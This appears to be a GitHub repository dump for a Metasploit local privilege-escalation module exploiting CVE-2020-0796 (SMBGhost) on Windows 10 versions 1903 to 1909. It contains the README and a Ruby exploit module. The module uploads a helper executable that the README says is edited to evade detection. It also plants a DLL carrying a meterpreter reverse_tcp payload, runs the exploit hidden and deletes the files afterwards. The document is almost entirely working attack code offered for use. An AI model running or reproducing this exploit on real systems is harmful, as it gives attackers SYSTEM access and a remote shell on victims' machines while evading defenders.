├── README.md ├── cve_2020_0796_payload.exe ├── demo.gif └── smbghost_PrivEsc.rb /README.md: -------------------------------------------------------------------------------- 1 | # SMBGhost-LPE-Metasploit-Module 2 | This is an implementation of the CVE-2020-0796 aka SMBGhost vulnerability, compatible with the Metasploit Framework 3 | 4 | # Notes: 5 | - This module made to be used when you have a valid shell to escalate your privileges. 6 | - You can change the payload, if you want to have your custom dll shellcode or if you want to encode it in some way. 7 | - The exe file is edited to evade detection and made it applicable to run and inject the dll shellcode. 8 | 9 | # Demo 10 | ![](demo.gif) 11 | 12 | # Credits 13 | - Credits for exploit authers {Daniel García Gutiérrez,Manuel Blanco Parajón}. 14 | - Credits also for Spencer McIntyre for his greate code too. 15 | 16 | # References 17 | - https://github.com/danigargu/CVE-2020-0796 18 | - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005 19 | - https://github.com/Almorabea/SMBGhost-WorkaroundApplier 20 | -------------------------------------------------------------------------------- /cve_2020_0796_payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Almorabea/SMBGhost-LPE-Metasploit-Module/8f5dc0de4e9f44db64059c6f376bd6445b86a942/cve_2020_0796_payload.exe -------------------------------------------------------------------------------- /demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Almorabea/SMBGhost-LPE-Metasploit-Module/8f5dc0de4e9f44db64059c6f376bd6445b86a942/demo.gif -------------------------------------------------------------------------------- /smbghost_PrivEsc.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This implementation of cve-2020-0796 aka SMBGhost. 3 | # This module made to be used when you have valid shell to escalate your privileges. 4 | # Credits for exploit authers {Daniel García Gutiérrez,Manuel Blanco Parajón}. 5 | # Credits also for Spencer McIntyre for his greate code too. 6 | # Note: 7 | # - You can change the payload, if you want to have your custom dll shellcode or if you want to encode it in some way. 8 | # - The exe file is edited to evade detection and made it applicable to run and inject the dll shellcode. 9 | # Auther of this module: Ahmad Almorabea @almorabea 10 | ## 11 | require 'msf/core/payload_generator' 12 | 13 | class MetasploitModule < Msf::Exploit::Local 14 | Rank = GoodRanking 15 | 16 | include Msf::Post::File 17 | include Msf::Post::Windows::Priv 18 | include Msf::Post::Windows::Process 19 | include Msf::Post::Windows::ReflectiveDLLInjection 20 | include Msf::Exploit::Remote::AutoCheck 21 | include Msf::Exploit::EXE 22 | 23 | 24 | def initialize(info = {}) 25 | super( 26 | update_info( 27 | info, 28 | { 29 | 'Name' => 'SMBv3 Compression Integer Buffer Overflow', 30 | 'Note' => 'We used dll in this modue to be injected, and run through Rundll32', 31 | 'Description' => %q{ 32 | A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to 33 | execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself 34 | before injecting a payload into winlogon.exe. 35 | }, 36 | 'License' => MSF_LICENSE, 37 | 'Author' => [ 38 | 39 | 'Ahmad Almorabea' # metasploit module 40 | ], 41 | 'Arch' => [ ARCH_X64 ], 42 | 'Platform' => 'win', 43 | 'SessionTypes' => [ 'meterpreter' ], 44 | 'DefaultOptions' => 45 | { 46 | 'EXITFUNC' => 'thread', 47 | 'Format' => 'dll' 48 | }, 49 | 50 | 'Targets' => 51 | [ 52 | 53 | [ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ] 54 | ], 55 | 'Payload' => 56 | { 57 | 'DisableNops' => true, 58 | 'Format' => 'dll', 59 | 'Platform' => 'win', 60 | 'Arch' =>'ARCH_X64', 61 | 'payload' => 'windows/meterpreter/reverse_tcp' 62 | }, 63 | 'References' => 64 | [ 65 | [ 'CVE', '2020-0796' ], 66 | [ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ], 67 | [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ] 68 | ], 69 | 'DisclosureDate' => '2020-03-13', 70 | 'DefaultTarget' => 0, 71 | 'AKA' => [ 'SMBGhost', 'CoronaBlue'], 72 | 'Notes' => 73 | { 74 | 'Stability' => [ CRASH_OS_RESTARTS, ], 75 | 'Reliability' => [ REPEATABLE_SESSION, ] 76 | } 77 | } 78 | ) 79 | ) 80 | end 81 | 82 | def check 83 | sysinfo_value = sysinfo['OS'] 84 | 85 | if sysinfo_value !~ /windows/i 86 | 87 | return Exploit::CheckCode::Safe 88 | end 89 | 90 | build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i 91 | vprint_status("Windows Build Number = #{build_num}") 92 | 93 | unless sysinfo_value =~ /10/ && (build_num >= 18362 && build_num <= 18363) 94 | print_error('The exploit only supports Windows 10 versions 1903 - 1909') 95 | return CheckCode::Safe 96 | end 97 | 98 | disable_compression = registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters', 'DisableCompression') 99 | if !disable_compression.nil? && disable_compression != 0 100 | print_error('The exploit requires compression to be enabled') 101 | return CheckCode::Safe 102 | end 103 | 104 | CheckCode::Appears 105 | end 106 | 107 | def exploit 108 | 109 | super 110 | 111 | if is_system? 112 | fail_with(Failure::None, 'Session is already elevated') 113 | end 114 | 115 | if sysinfo['Architecture'] =~ /wow64/i 116 | fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') 117 | elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 118 | fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') 119 | elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 120 | fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') 121 | end 122 | 123 | print_status('Starting process in the victim machine...') 124 | 125 | print_status("Preparing exploit in the victim machine ...") 126 | exploit_path = ::File.join(File.dirname(__FILE__), 'cve_2020_0796_payload.exe') 127 | 128 | upload_file("cve_2020_0796_payload.exe",exploit_path) 129 | 130 | 131 | print_status("Preparing Shellcode to be injected...") 132 | 133 | 134 | encoded_payload = generate_payload_dll(code: payload.generate) 135 | File.open(__dir__+"/log.dll", "w+") { |f| f.write encoded_payload } 136 | 137 | library_path = ::File.join(File.dirname(__FILE__), 'log.dll') 138 | #library_path = ::File.expand_path(library_path) 139 | 140 | upload_file("c:/Users/Public/shell.dll",library_path) 141 | 142 | print_status("Injecting exploit...") 143 | 144 | print_status("Leaking Kernal Address..") 145 | 146 | exploit_process = client.sys.process.execute('cve_2020_0796_payload.exe', nil, { 'Hidden' => true }) 147 | 148 | print_status("Exploit injected...") 149 | 150 | print_status("Retrieving Exploit pid #{exploit_process.pid}...") 151 | 152 | print_status("Retrieving Exploit handle #{exploit_process.handle}...") 153 | 154 | print_status("Retrieving Exploit Channel #{exploit_process.channel}...") 155 | 156 | rm_f('cve_2020_0796_payload.exe') 157 | rm_f('c:/Users/Public/shell.dll') 158 | 159 | print_status('Payload injected. Executing exploit...') 160 | 161 | print_good('Exploit finished, wait for payload execution to complete. if not! it could be stopped by WinDefend or a firewall') 162 | end 163 | 164 | 165 | 166 | end 167 | --------------------------------------------------------------------------------